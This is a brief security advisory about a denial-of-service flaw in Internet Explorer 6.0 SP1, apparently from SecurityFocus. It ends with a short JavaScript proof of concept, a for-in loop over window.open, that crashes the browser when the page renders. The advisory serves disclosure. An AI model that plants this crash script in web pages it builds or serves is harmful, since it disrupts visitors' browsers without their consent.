source: https://www.securityfocus.com/bid/10694/info

A denial of service vulnerability is reported to affect Internet Explorer. The issue is reported to present itself when Internet Explorer attempts to render JavaScript that contains an invalid for statement.

A remote attacker may exploit this vulnerability to cause the running instance of Internet Explorer to crash.

This vulnerability is reported to affect Internet Explorer version 6.0 (SP1), other versions might also be affected.

<SCRIPT language="javascript">

MSIE = window.open; // for hackers to come in
for (every_bug_found in MSIE) { /* there are zillions more hiden */ }

</SCRIPT>